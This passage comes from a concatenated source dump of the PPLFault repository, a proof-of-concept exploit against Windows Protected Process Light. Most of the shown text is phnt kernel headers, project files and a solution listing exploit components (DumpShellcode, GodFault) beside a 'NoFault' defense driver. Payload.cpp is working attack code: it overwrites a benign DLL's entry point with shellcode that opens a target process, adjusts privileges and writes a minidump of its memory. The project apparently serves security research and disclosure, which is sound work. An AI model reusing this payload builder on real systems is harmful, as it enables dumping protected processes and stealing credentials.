52 | 53 | These terms do not imply any licenses other than those expressly granted in 54 | these terms. 55 | 56 | ## Termination 57 | 58 | If you use the software in violation of these terms, such use is not licensed, 59 | and your licenses will automatically terminate. If the licensor provides you 60 | with a notice of your violation, and you cease all violation of this license no 61 | later than 30 days after you receive that notice, your licenses will be 62 | reinstated retroactively. However, if you violate these terms after such 63 | reinstatement, any additional violation of these terms will cause your licenses 64 | to terminate automatically and permanently. 65 | 66 | ## No Liability 67 | 68 | *As far as the law allows, the software comes as is, without any warranty or 69 | condition, and the licensor will not be liable to you for any damages arising 70 | out of these terms or the use or nature of the software, under any kind of 71 | legal claim.* 72 | 73 | ## Definitions 74 | 75 | The **licensor** is the entity offering these terms, and the **software** is the 76 | software the licensor makes available under these terms, including any portion 77 | of it. 78 | 79 | **you** refers to the individual or entity agreeing to these terms. 80 | 81 | **your company** is any legal entity, sole proprietorship, or other kind of 82 | organization that you work for, plus all organizations that have control over, 83 | are under the control of, or are under common control with that 84 | organization. **control** means ownership of substantially all the assets of an 85 | entity, or the power to direct its management and policies by vote, contract, or 86 | otherwise. Control can be direct or indirect. 87 | 88 | **your licenses** are all the licenses granted to you for the software under 89 | these terms. 90 | 91 | **use** means anything you do with the software requiring one of your licenses. 92 | 93 | **trademark** means trademarks, service marks, and similar rights. 94 | -------------------------------------------------------------------------------- /phnt/include/ntkeapi.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Kernel executive support library 3 | * 4 | * This file is part of System Informer. 5 | */ 6 | 7 | #ifndef _NTKEAPI_H 8 | #define _NTKEAPI_H 9 | 10 | #if (PHNT_MODE != PHNT_MODE_KERNEL) 11 | #define LOW_PRIORITY 0 // Lowest thread priority level 12 | #define LOW_REALTIME_PRIORITY 16 // Lowest realtime priority level 13 | #define HIGH_PRIORITY 31 // Highest thread priority level 14 | #define MAXIMUM_PRIORITY 32 // Number of thread priority levels 15 | #endif 16 | 17 | typedef enum _KTHREAD_STATE 18 | { 19 | Initialized, 20 | Ready, 21 | Running, 22 | Standby, 23 | Terminated, 24 | Waiting, 25 | Transition, 26 | DeferredReady, 27 | GateWaitObsolete, 28 | WaitingForProcessInSwap, 29 | MaximumThreadState 30 | } KTHREAD_STATE, *PKTHREAD_STATE; 31 | 32 | // private 33 | typedef enum _KHETERO_CPU_POLICY 34 | { 35 | KHeteroCpuPolicyAll = 0, 36 | KHeteroCpuPolicyLarge = 1, 37 | KHeteroCpuPolicyLargeOrIdle = 2, 38 | KHeteroCpuPolicySmall = 3, 39 | KHeteroCpuPolicySmallOrIdle = 4, 40 | KHeteroCpuPolicyDynamic = 5, 41 | KHeteroCpuPolicyStaticMax = 5, // valid 42 | KHeteroCpuPolicyBiasedSmall = 6, 43 | KHeteroCpuPolicyBiasedLarge = 7, 44 | KHeteroCpuPolicyDefault = 8, 45 | KHeteroCpuPolicyMax = 9 46 | } KHETERO_CPU_POLICY, *PKHETERO_CPU_POLICY; 47 | 48 | #if (PHNT_MODE != PHNT_MODE_KERNEL) 49 | 50 | typedef enum _KWAIT_REASON 51 | { 52 | Executive, 53 | FreePage, 54 | PageIn, 55 | PoolAllocation, 56 | DelayExecution, 57 | Suspended, 58 | UserRequest, 59 | WrExecutive, 60 | WrFreePage, 61 | WrPageIn, 62 | WrPoolAllocation, 63 | WrDelayExecution, 64 | WrSuspended, 65 | WrUserRequest, 66 | WrEventPair, 67 | WrQueue, 68 | WrLpcReceive, 69 | WrLpcReply, 70 | WrVirtualMemory, 71 | WrPageOut, 72 | WrRendezvous, 73 | WrKeyedEvent, 74 | WrTerminated, 75 | WrProcessInSwap, 76 | WrCpuRateControl, 77 | WrCalloutStack, 78 | WrKernel, 79 | WrResource, 80 | WrPushLock, 81 | WrMutex, 82 | WrQuantumEnd, 83 | WrDispatchInt, 84 | WrPreempted, 85 | WrYieldExecution, 86 | WrFastMutex, 87 | WrGuardedMutex, 88 | WrRundown, 89 | WrAlertByThreadId, 90 | WrDeferredPreempt, 91 | WrPhysicalFault, 92 | WrIoRing, 93 | WrMdlCache, 94 | MaximumWaitReason 95 | } KWAIT_REASON, *PKWAIT_REASON; 96 | 97 | typedef enum _KPROFILE_SOURCE 98 | { 99 | ProfileTime, 100 | ProfileAlignmentFixup, 101 | ProfileTotalIssues, 102 | ProfilePipelineDry, 103 | ProfileLoadInstructions, 104 | ProfilePipelineFrozen, 105 | ProfileBranchInstructions, 106 | ProfileTotalNonissues, 107 | ProfileDcacheMisses, 108 | ProfileIcacheMisses, 109 | ProfileCacheMisses, 110 | ProfileBranchMispredictions, 111 | ProfileStoreInstructions, 112 | ProfileFpInstructions, 113 | ProfileIntegerInstructions, 114 | Profile2Issue, 115 | Profile3Issue, 116 | Profile4Issue, 117 | ProfileSpecialInstructions, 118 | ProfileTotalCycles, 119 | ProfileIcacheIssues, 120 | ProfileDcacheAccesses, 121 | ProfileMemoryBarrierCycles, 122 | ProfileLoadLinkedIssues, 123 | ProfileMaximum 124 | } KPROFILE_SOURCE; 125 | 126 | #endif 127 | 128 | #if (PHNT_MODE != PHNT_MODE_KERNEL) 129 | 130 | NTSYSCALLAPI 131 | NTSTATUS 132 | NTAPI 133 | NtCallbackReturn( 134 | _In_reads_bytes_opt_(OutputLength) PVOID OutputBuffer, 135 | _In_ ULONG OutputLength, 136 | _In_ NTSTATUS Status 137 | ); 138 | 139 | #if (PHNT_VERSION >= PHNT_VISTA) 140 | NTSYSCALLAPI 141 | VOID 142 | NTAPI 143 | NtFlushProcessWriteBuffers( 144 | VOID 145 | ); 146 | #endif 147 | 148 | NTSYSCALLAPI 149 | NTSTATUS 150 | NTAPI 151 | NtQueryDebugFilterState( 152 | _In_ ULONG ComponentId, 153 | _In_ ULONG Level 154 | ); 155 | 156 | NTSYSCALLAPI 157 | NTSTATUS 158 | NTAPI 159 | NtSetDebugFilterState( 160 | _In_ ULONG ComponentId, 161 | _In_ ULONG Level, 162 | _In_ BOOLEAN State 163 | ); 164 | 165 | NTSYSCALLAPI 166 | NTSTATUS 167 | NTAPI 168 | NtYieldExecution( 169 | VOID 170 | ); 171 | 172 | #endif 173 | 174 | #endif 175 | -------------------------------------------------------------------------------- /NoFault/NoFault.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | x64 7 | 8 | 9 | Release 10 | x64 11 | 12 | 13 | 14 | {1246CAFF-A3FD-4674-B625-A4E69E15A33C} 15 | {dd38f7fc-d7bd-488b-9242-7d8754cde80d} 16 | v4.5 17 | 12.0 18 | Debug 19 | Win32 20 | NoFault 21 | 22 | 23 | 24 | Windows10 25 | true 26 | WindowsKernelModeDriver10.0 27 | Driver 28 | WDM 29 | 30 | 31 | Windows10 32 | false 33 | WindowsKernelModeDriver10.0 34 | Driver 35 | WDM 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | DbgengKernelDebugger 47 | 48 | 49 | DbgengKernelDebugger 50 | 51 | 52 | 53 | sha256 54 | 55 | 56 | %(AdditionalDependencies);$(KernelBufferOverflowLib);$(DDK_LIB_PATH)ntoskrnl.lib;$(DDK_LIB_PATH)hal.lib;$(DDK_LIB_PATH)wmilib.lib 57 | /INTEGRITYCHECK %(AdditionalOptions) 58 | 59 | 60 | _DEBUG;_WIN64;_AMD64_;AMD64;%(PreprocessorDefinitions) 61 | $(SolutionDir)/phnt/include;$(IntDir);%(AdditionalIncludeDirectories) 62 | 63 | 64 | 65 | 66 | sha256 67 | 68 | 69 | %(AdditionalDependencies);$(KernelBufferOverflowLib);$(DDK_LIB_PATH)ntoskrnl.lib;$(DDK_LIB_PATH)hal.lib;$(DDK_LIB_PATH)wmilib.lib 70 | /INTEGRITYCHECK %(AdditionalOptions) 71 | 72 | 73 | $(SolutionDir)/phnt/include;$(IntDir);%(AdditionalIncludeDirectories) 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | -------------------------------------------------------------------------------- /Utils/Utils.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | x64 7 | 8 | 9 | Release 10 | x64 11 | 12 | 13 | 14 | 16.0 15 | Win32Proj 16 | {18110af9-d47e-4e25-991c-53d692cccdde} 17 | Utils 18 | 10.0 19 | 20 | 21 | 22 | StaticLibrary 23 | true 24 | v142 25 | Unicode 26 | 27 | 28 | StaticLibrary 29 | false 30 | v142 31 | true 32 | Unicode 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | true 48 | 49 | 50 | false 51 | 52 | 53 | 54 | Level3 55 | true 56 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 57 | true 58 | $(SolutionDir)/phnt/include 59 | 60 | 61 | Console 62 | true 63 | 64 | 65 | 66 | 67 | Level3 68 | true 69 | true 70 | true 71 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 72 | true 73 | MultiThreaded 74 | $(SolutionDir)/phnt/include 75 | 76 | 77 | Console 78 | true 79 | true 80 | true 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | -------------------------------------------------------------------------------- /PPLFault/Payload.cpp: -------------------------------------------------------------------------------- 1 | // PPLFault by Gabriel Landau 2 | // https://twitter.com/GabrielLandau 3 | 4 | #define _CRT_SECURE_NO_WARNINGS 5 | #include "Payload.h" 6 | #include "DumpShellcode.h" 7 | #include "resource.h" 8 | #include "Logging.h" 9 | #include "PayloadUtils.h" 10 | #include 11 | #include 12 | #include 13 | 14 | // Builds a SHELLCODE_PARAMS struct so our payload can be smaller and simpler 15 | bool InitShellcodeParams( 16 | PSHELLCODE_PARAMS pParams, 17 | DWORD dwTargetProcessId, 18 | PCWCHAR pDumpPath 19 | ) 20 | { 21 | HMODULE hKernel32 = GetModuleHandleW(L"kernel32.dll"); 22 | HMODULE hNtdll = GetModuleHandleW(L"ntdll.dll"); 23 | 24 | if ((NULL == hKernel32) || (NULL == hNtdll)) 25 | { 26 | Log(Error, "Couldn't find kernel32/ntdll? What?"); 27 | return false; 28 | } 29 | 30 | pParams->magic1 = MAGIC1; 31 | pParams->magic2 = MAGIC2; 32 | 33 | // User params 34 | pParams->dwTargetProcessId = dwTargetProcessId; 35 | if (wcslen(pDumpPath) >= _countof(pParams->dumpPath)) 36 | { 37 | Log(Error, "Dump path too long: %ws", pDumpPath); 38 | return false; 39 | } 40 | wcsncpy(pParams->dumpPath, pDumpPath, _countof(pParams->dumpPath)); 41 | 42 | // Strings (so we don't have to embed them in shellcode) 43 | strncpy(pParams->szMiniDumpWriteDump, "MiniDumpWriteDump", _countof(pParams->szMiniDumpWriteDump)); 44 | wcsncpy(pParams->szDbgHelpDll, L"Dbghelp.dll", _countof(pParams->szDbgHelpDll)); 45 | 46 | // IAT 47 | // Target process should already have kernel32 loaded, so we can just pass pointers over 48 | pParams->pLoadLibraryW = (LoadLibraryW_t)GetProcAddress(hKernel32, "LoadLibraryW"); 49 | pParams->pGetProcAddress = (GetProcAddress_t)GetProcAddress(hKernel32, "GetProcAddress"); 50 | pParams->pOpenProcess = (OpenProcess_t)GetProcAddress(hKernel32, "OpenProcess"); 51 | pParams->pCreateFileW = (CreateFileW_t)GetProcAddress(hKernel32, "CreateFileW"); 52 | pParams->pTerminateProcess = (TerminateProcess_t)GetProcAddress(hKernel32, "TerminateProcess"); 53 | pParams->pRtlAdjustPrivilege = (RtlAdjustPrivilege_t)GetProcAddress(hNtdll, "RtlAdjustPrivilege"); 54 | 55 | if (!pParams->pLoadLibraryW || 56 | !pParams->pGetProcAddress || 57 | !pParams->pOpenProcess || 58 | !pParams->pCreateFileW || 59 | !pParams->pTerminateProcess || 60 | !pParams->pRtlAdjustPrivilege) 61 | { 62 | Log(Error, "Failed to resolve a payload import"); 63 | return false; 64 | } 65 | 66 | return true; 67 | } 68 | 69 | // Build a payload that consists of the given benign DLL with its entrypoint overwritten by our shellcode 70 | bool BuildPayload( 71 | HANDLE hBenignDll, 72 | std::string & payloadBuffer, 73 | DWORD dwTargetProcessId, 74 | PCWCHAR pDumpPath) 75 | { 76 | std::string buf; 77 | LARGE_INTEGER dllSize; 78 | DWORD dwBytesRead = 0; 79 | PVOID pEntrypoint = NULL; 80 | DWORD bytesWritten = 0; 81 | SHELLCODE_PARAMS params = { 0, }; 82 | SIZE_T availableSpace = 0; 83 | 84 | // Read entire source file into buffer 85 | SetFilePointer(hBenignDll, 0, NULL, SEEK_SET); 86 | GetFileSizeEx(hBenignDll, &dllSize); 87 | buf.resize(dllSize.QuadPart); 88 | 89 | if (!ReadFile(hBenignDll, &buf[0], dllSize.LowPart, &dwBytesRead, NULL) || 90 | (dwBytesRead != dllSize.QuadPart)) 91 | { 92 | Log(Error, "BuildPayload: ReadFile failed with GLE %u", GetLastError()); 93 | return false; 94 | } 95 | 96 | // Find the entrypoint 97 | pEntrypoint = FindEntrypointVA(buf); 98 | if (!pEntrypoint) 99 | { 100 | return false; 101 | } 102 | 103 | availableSpace = &buf[buf.size()] - (char*)pEntrypoint; 104 | 105 | // Overwrite entrypoint with shellcode embedded in our resource section 106 | if (!WriteShellcode(MAKEINTRESOURCE(RES_PAYLOAD), pEntrypoint, availableSpace, bytesWritten)) 107 | { 108 | return false; 109 | } 110 | 111 | // Create a SHELLCODE_PARAMS and write it after the shellcode 112 | if (!InitShellcodeParams(¶ms, dwTargetProcessId, pDumpPath)) 113 | { 114 | return false; 115 | } 116 | 117 | if (&buf[buf.size() - 1] - (char*)pEntrypoint + bytesWritten < sizeof(params)) 118 | { 119 | Log(Error, "Not enough space for SHELLCODE_PARAMS"); 120 | return false; 121 | } 122 | 123 | // Install SHELLCODE_PARAMS 124 | memcpy(((PUCHAR)pEntrypoint) + bytesWritten, ¶ms, sizeof(params)); 125 | 126 | payloadBuffer = std::move(buf); 127 | 128 | return true; 129 | } 130 | -------------------------------------------------------------------------------- /phnt/include/ntgdi.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Graphics device interface support 3 | * 4 | * This file is part of System Informer. 5 | */ 6 | 7 | #ifndef _NTGDI_H 8 | #define _NTGDI_H 9 | 10 | #define GDI_MAX_HANDLE_COUNT 0xFFFF // 0x4000 11 | 12 | #define GDI_HANDLE_INDEX_SHIFT 0 13 | #define GDI_HANDLE_INDEX_BITS 16 14 | #define GDI_HANDLE_INDEX_MASK 0xffff 15 | 16 | #define GDI_HANDLE_TYPE_SHIFT 16 17 | #define GDI_HANDLE_TYPE_BITS 5 18 | #define GDI_HANDLE_TYPE_MASK 0x1f 19 | 20 | #define GDI_HANDLE_ALTTYPE_SHIFT 21 21 | #define GDI_HANDLE_ALTTYPE_BITS 2 22 | #define GDI_HANDLE_ALTTYPE_MASK 0x3 23 | 24 | #define GDI_HANDLE_STOCK_SHIFT 23 25 | #define GDI_HANDLE_STOCK_BITS 1 26 | #define GDI_HANDLE_STOCK_MASK 0x1 27 | 28 | #define GDI_HANDLE_UNIQUE_SHIFT 24 29 | #define GDI_HANDLE_UNIQUE_BITS 8 30 | #define GDI_HANDLE_UNIQUE_MASK 0xff 31 | 32 | #define GDI_HANDLE_INDEX(Handle) ((ULONG)(Handle) & GDI_HANDLE_INDEX_MASK) 33 | #define GDI_HANDLE_TYPE(Handle) (((ULONG)(Handle) >> GDI_HANDLE_TYPE_SHIFT) & GDI_HANDLE_TYPE_MASK) 34 | #define GDI_HANDLE_ALTTYPE(Handle) (((ULONG)(Handle) >> GDI_HANDLE_ALTTYPE_SHIFT) & GDI_HANDLE_ALTTYPE_MASK) 35 | #define GDI_HANDLE_STOCK(Handle) (((ULONG)(Handle) >> GDI_HANDLE_STOCK_SHIFT)) & GDI_HANDLE_STOCK_MASK) 36 | 37 | #define GDI_MAKE_HANDLE(Index, Unique) ((ULONG)(((ULONG)(Unique) << GDI_HANDLE_INDEX_BITS) | (ULONG)(Index))) 38 | 39 | // GDI server-side types 40 | 41 | #define GDI_DEF_TYPE 0 // invalid handle 42 | #define GDI_DC_TYPE 1 43 | #define GDI_DD_DIRECTDRAW_TYPE 2 44 | #define GDI_DD_SURFACE_TYPE 3 45 | #define GDI_RGN_TYPE 4 46 | #define GDI_SURF_TYPE 5 47 | #define GDI_CLIENTOBJ_TYPE 6 48 | #define GDI_PATH_TYPE 7 49 | #define GDI_PAL_TYPE 8 50 | #define GDI_ICMLCS_TYPE 9 51 | #define GDI_LFONT_TYPE 10 52 | #define GDI_RFONT_TYPE 11 53 | #define GDI_PFE_TYPE 12 54 | #define GDI_PFT_TYPE 13 55 | #define GDI_ICMCXF_TYPE 14 56 | #define GDI_ICMDLL_TYPE 15 57 | #define GDI_BRUSH_TYPE 16 58 | #define GDI_PFF_TYPE 17 // unused 59 | #define GDI_CACHE_TYPE 18 // unused 60 | #define GDI_SPACE_TYPE 19 61 | #define GDI_DBRUSH_TYPE 20 // unused 62 | #define GDI_META_TYPE 21 63 | #define GDI_EFSTATE_TYPE 22 64 | #define GDI_BMFD_TYPE 23 // unused 65 | #define GDI_VTFD_TYPE 24 // unused 66 | #define GDI_TTFD_TYPE 25 // unused 67 | #define GDI_RC_TYPE 26 // unused 68 | #define GDI_TEMP_TYPE 27 // unused 69 | #define GDI_DRVOBJ_TYPE 28 70 | #define GDI_DCIOBJ_TYPE 29 // unused 71 | #define GDI_SPOOL_TYPE 30 72 | 73 | // GDI client-side types 74 | 75 | #define GDI_CLIENT_TYPE_FROM_HANDLE(Handle) ((ULONG)(Handle) & ((GDI_HANDLE_ALTTYPE_MASK << GDI_HANDLE_ALTTYPE_SHIFT) | \ 76 | (GDI_HANDLE_TYPE_MASK << GDI_HANDLE_TYPE_SHIFT))) 77 | #define GDI_CLIENT_TYPE_FROM_UNIQUE(Unique) GDI_CLIENT_TYPE_FROM_HANDLE((ULONG)(Unique) << 16) 78 | 79 | #define GDI_ALTTYPE_1 (1 << GDI_HANDLE_ALTTYPE_SHIFT) 80 | #define GDI_ALTTYPE_2 (2 << GDI_HANDLE_ALTTYPE_SHIFT) 81 | #define GDI_ALTTYPE_3 (3 << GDI_HANDLE_ALTTYPE_SHIFT) 82 | 83 | #define GDI_CLIENT_BITMAP_TYPE (GDI_SURF_TYPE << GDI_HANDLE_TYPE_SHIFT) 84 | #define GDI_CLIENT_BRUSH_TYPE (GDI_BRUSH_TYPE << GDI_HANDLE_TYPE_SHIFT) 85 | #define GDI_CLIENT_CLIENTOBJ_TYPE (GDI_CLIENTOBJ_TYPE << GDI_HANDLE_TYPE_SHIFT) 86 | #define GDI_CLIENT_DC_TYPE (GDI_DC_TYPE << GDI_HANDLE_TYPE_SHIFT) 87 | #define GDI_CLIENT_FONT_TYPE (GDI_LFONT_TYPE << GDI_HANDLE_TYPE_SHIFT) 88 | #define GDI_CLIENT_PALETTE_TYPE (GDI_PAL_TYPE << GDI_HANDLE_TYPE_SHIFT) 89 | #define GDI_CLIENT_REGION_TYPE (GDI_RGN_TYPE << GDI_HANDLE_TYPE_SHIFT) 90 | 91 | #define GDI_CLIENT_ALTDC_TYPE (GDI_CLIENT_DC_TYPE | GDI_ALTTYPE_1) 92 | #define GDI_CLIENT_DIBSECTION_TYPE (GDI_CLIENT_BITMAP_TYPE | GDI_ALTTYPE_1) 93 | #define GDI_CLIENT_EXTPEN_TYPE (GDI_CLIENT_BRUSH_TYPE | GDI_ALTTYPE_2) 94 | #define GDI_CLIENT_METADC16_TYPE (GDI_CLIENT_CLIENTOBJ_TYPE | GDI_ALTTYPE_3) 95 | #define GDI_CLIENT_METAFILE_TYPE (GDI_CLIENT_CLIENTOBJ_TYPE | GDI_ALTTYPE_2) 96 | #define GDI_CLIENT_METAFILE16_TYPE (GDI_CLIENT_CLIENTOBJ_TYPE | GDI_ALTTYPE_1) 97 | #define GDI_CLIENT_PEN_TYPE (GDI_CLIENT_BRUSH_TYPE | GDI_ALTTYPE_1) 98 | 99 | typedef struct _GDI_HANDLE_ENTRY 100 | { 101 | union 102 | { 103 | PVOID Object; 104 | PVOID NextFree; 105 | }; 106 | union 107 | { 108 | struct 109 | { 110 | USHORT ProcessId; 111 | USHORT Lock : 1; 112 | USHORT Count : 15; 113 | }; 114 | ULONG Value; 115 | } Owner; 116 | USHORT Unique; 117 | UCHAR Type; 118 | UCHAR Flags; 119 | PVOID UserPointer; 120 | } GDI_HANDLE_ENTRY, *PGDI_HANDLE_ENTRY; 121 | 122 | typedef struct _GDI_SHARED_MEMORY 123 | { 124 | GDI_HANDLE_ENTRY Handles[GDI_MAX_HANDLE_COUNT]; 125 | } GDI_SHARED_MEMORY, *PGDI_SHARED_MEMORY; 126 | 127 | #endif 128 | -------------------------------------------------------------------------------- /PPLFault.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.32802.440 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "PPLFault", "PPLFault\PPLFault.vcxproj", "{B2E27B81-83D9-47C6-A27E-94A79D0234D7}" 7 | ProjectSection(ProjectDependencies) = postProject 8 | {48DBC3F5-99E0-4904-B83E-58419768F52E} = {48DBC3F5-99E0-4904-B83E-58419768F52E} 9 | {18110AF9-D47E-4E25-991C-53D692CCCDDE} = {18110AF9-D47E-4E25-991C-53D692CCCDDE} 10 | EndProjectSection 11 | EndProject 12 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DumpShellcode", "DumpShellcode\DumpShellcode.vcxproj", "{48DBC3F5-99E0-4904-B83E-58419768F52E}" 13 | EndProject 14 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "GodFault", "GodFault\GodFault.vcxproj", "{3C206B0D-0725-4D6D-8047-BBCC6D260410}" 15 | ProjectSection(ProjectDependencies) = postProject 16 | {4AC42F11-3B8D-49FC-BD5F-341E42488630} = {4AC42F11-3B8D-49FC-BD5F-341E42488630} 17 | {18110AF9-D47E-4E25-991C-53D692CCCDDE} = {18110AF9-D47E-4E25-991C-53D692CCCDDE} 18 | EndProjectSection 19 | EndProject 20 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "GMShellcode", "GMShellcode\GMShellcode.vcxproj", "{4AC42F11-3B8D-49FC-BD5F-341E42488630}" 21 | EndProject 22 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NoFault", "NoFault\NoFault.vcxproj", "{1246CAFF-A3FD-4674-B625-A4E69E15A33C}" 23 | EndProject 24 | Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Dumper", "Dumper", "{948E50B1-F3D3-4794-B933-82A24F230298}" 25 | EndProject 26 | Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "GodMode", "GodMode", "{BABFCD68-33E7-45AC-B618-EB8AE29160C8}" 27 | EndProject 28 | Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Defense", "Defense", "{AC172BF9-B506-4E38-B29E-1B5DE351DAFE}" 29 | EndProject 30 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Utils", "Utils\Utils.vcxproj", "{18110AF9-D47E-4E25-991C-53D692CCCDDE}" 31 | EndProject 32 | Global 33 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 34 | Debug|x64 = Debug|x64 35 | Release|x64 = Release|x64 36 | EndGlobalSection 37 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 38 | {B2E27B81-83D9-47C6-A27E-94A79D0234D7}.Debug|x64.ActiveCfg = Debug|x64 39 | {B2E27B81-83D9-47C6-A27E-94A79D0234D7}.Debug|x64.Build.0 = Debug|x64 40 | {B2E27B81-83D9-47C6-A27E-94A79D0234D7}.Release|x64.ActiveCfg = Release|x64 41 | {B2E27B81-83D9-47C6-A27E-94A79D0234D7}.Release|x64.Build.0 = Release|x64 42 | {48DBC3F5-99E0-4904-B83E-58419768F52E}.Debug|x64.ActiveCfg = Debug|x64 43 | {48DBC3F5-99E0-4904-B83E-58419768F52E}.Debug|x64.Build.0 = Debug|x64 44 | {48DBC3F5-99E0-4904-B83E-58419768F52E}.Release|x64.ActiveCfg = Release|x64 45 | {48DBC3F5-99E0-4904-B83E-58419768F52E}.Release|x64.Build.0 = Release|x64 46 | {3C206B0D-0725-4D6D-8047-BBCC6D260410}.Debug|x64.ActiveCfg = Debug|x64 47 | {3C206B0D-0725-4D6D-8047-BBCC6D260410}.Debug|x64.Build.0 = Debug|x64 48 | {3C206B0D-0725-4D6D-8047-BBCC6D260410}.Release|x64.ActiveCfg = Release|x64 49 | {3C206B0D-0725-4D6D-8047-BBCC6D260410}.Release|x64.Build.0 = Release|x64 50 | {4AC42F11-3B8D-49FC-BD5F-341E42488630}.Debug|x64.ActiveCfg = Debug|x64 51 | {4AC42F11-3B8D-49FC-BD5F-341E42488630}.Debug|x64.Build.0 = Debug|x64 52 | {4AC42F11-3B8D-49FC-BD5F-341E42488630}.Release|x64.ActiveCfg = Release|x64 53 | {4AC42F11-3B8D-49FC-BD5F-341E42488630}.Release|x64.Build.0 = Release|x64 54 | {1246CAFF-A3FD-4674-B625-A4E69E15A33C}.Debug|x64.ActiveCfg = Debug|x64 55 | {1246CAFF-A3FD-4674-B625-A4E69E15A33C}.Debug|x64.Build.0 = Debug|x64 56 | {1246CAFF-A3FD-4674-B625-A4E69E15A33C}.Debug|x64.Deploy.0 = Debug|x64 57 | {1246CAFF-A3FD-4674-B625-A4E69E15A33C}.Release|x64.ActiveCfg = Release|x64 58 | {1246CAFF-A3FD-4674-B625-A4E69E15A33C}.Release|x64.Build.0 = Release|x64 59 | {1246CAFF-A3FD-4674-B625-A4E69E15A33C}.Release|x64.Deploy.0 = Release|x64 60 | {18110AF9-D47E-4E25-991C-53D692CCCDDE}.Debug|x64.ActiveCfg = Debug|x64 61 | {18110AF9-D47E-4E25-991C-53D692CCCDDE}.Debug|x64.Build.0 = Debug|x64 62 | {18110AF9-D47E-4E25-991C-53D692CCCDDE}.Release|x64.ActiveCfg = Release|x64 63 | {18110AF9-D47E-4E25-991C-53D692CCCDDE}.Release|x64.Build.0 = Release|x64 64 | EndGlobalSection 65 | GlobalSection(SolutionProperties) = preSolution 66 | HideSolutionNode = FALSE 67 | EndGlobalSection 68 | GlobalSection(NestedProjects) = preSolution 69 | {B2E27B81-83D9-47C6-A27E-94A79D0234D7} = {948E50B1-F3D3-4794-B933-82A24F230298} 70 | {48DBC3F5-99E0-4904-B83E-58419768F52E} = {948E50B1-F3D3-4794-B933-82A24F230298} 71 | {3C206B0D-0725-4D6D-8047-BBCC6D260410} = {BABFCD68-33E7-45AC-B618-EB8AE29160C8} 72 | {4AC42F11-3B8D-49FC-BD5F-341E42488630} = {BABFCD68-33E7-45AC-B618-EB8AE29160C8} 73 | {1246CAFF-A3FD-4674-B625-A4E69E15A33C} = {AC172BF9-B506-4E38-B29E-1B5DE351DAFE} 74 | EndGlobalSection 75 | GlobalSection(ExtensibilityGlobals) = postSolution 76 | SolutionGuid = {5B643C9D-2874-4864-BDF2-3A8192FA5986} 77 | EndGlobalSection 78 | EndGlobal 79 | -------------------------------------------------------------------------------- /phnt/include/ntpnpapi.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Plug and Play support functions 3 | * 4 | * This file is part of System Informer. 5 | */ 6 | 7 | #ifndef _NTPNPAPI_H 8 | #define _NTPNPAPI_H 9 | 10 | typedef enum _PLUGPLAY_EVENT_CATEGORY 11 | { 12 | HardwareProfileChangeEvent, 13 | TargetDeviceChangeEvent, 14 | DeviceClassChangeEvent, 15 | CustomDeviceEvent, 16 | DeviceInstallEvent, 17 | DeviceArrivalEvent, 18 | PowerEvent, 19 | VetoEvent, 20 | BlockedDriverEvent, 21 | InvalidIDEvent, 22 | MaxPlugEventCategory 23 | } PLUGPLAY_EVENT_CATEGORY, *PPLUGPLAY_EVENT_CATEGORY; 24 | 25 | typedef struct _PLUGPLAY_EVENT_BLOCK 26 | { 27 | GUID EventGuid; 28 | PLUGPLAY_EVENT_CATEGORY EventCategory; 29 | PULONG Result; 30 | ULONG Flags; 31 | ULONG TotalSize; 32 | PVOID DeviceObject; 33 | 34 | union 35 | { 36 | struct 37 | { 38 | GUID ClassGuid; 39 | WCHAR SymbolicLinkName[1]; 40 | } DeviceClass; 41 | struct 42 | { 43 | WCHAR DeviceIds[1]; 44 | } TargetDevice; 45 | struct 46 | { 47 | WCHAR DeviceId[1]; 48 | } InstallDevice; 49 | struct 50 | { 51 | PVOID NotificationStructure; 52 | WCHAR DeviceIds[1]; 53 | } CustomNotification; 54 | struct 55 | { 56 | PVOID Notification; 57 | } ProfileNotification; 58 | struct 59 | { 60 | ULONG NotificationCode; 61 | ULONG NotificationData; 62 | } PowerNotification; 63 | struct 64 | { 65 | PNP_VETO_TYPE VetoType; 66 | WCHAR DeviceIdVetoNameBuffer[1]; // DeviceIdVetoName 67 | } VetoNotification; 68 | struct 69 | { 70 | GUID BlockedDriverGuid; 71 | } BlockedDriverNotification; 72 | struct 73 | { 74 | WCHAR ParentId[1]; 75 | } InvalidIDNotification; 76 | } u; 77 | } PLUGPLAY_EVENT_BLOCK, *PPLUGPLAY_EVENT_BLOCK; 78 | 79 | typedef enum _PLUGPLAY_CONTROL_CLASS 80 | { 81 | PlugPlayControlEnumerateDevice, // PLUGPLAY_CONTROL_ENUMERATE_DEVICE_DATA 82 | PlugPlayControlRegisterNewDevice, // PLUGPLAY_CONTROL_DEVICE_CONTROL_DATA 83 | PlugPlayControlDeregisterDevice, // PLUGPLAY_CONTROL_DEVICE_CONTROL_DATA 84 | PlugPlayControlInitializeDevice, // PLUGPLAY_CONTROL_DEVICE_CONTROL_DATA 85 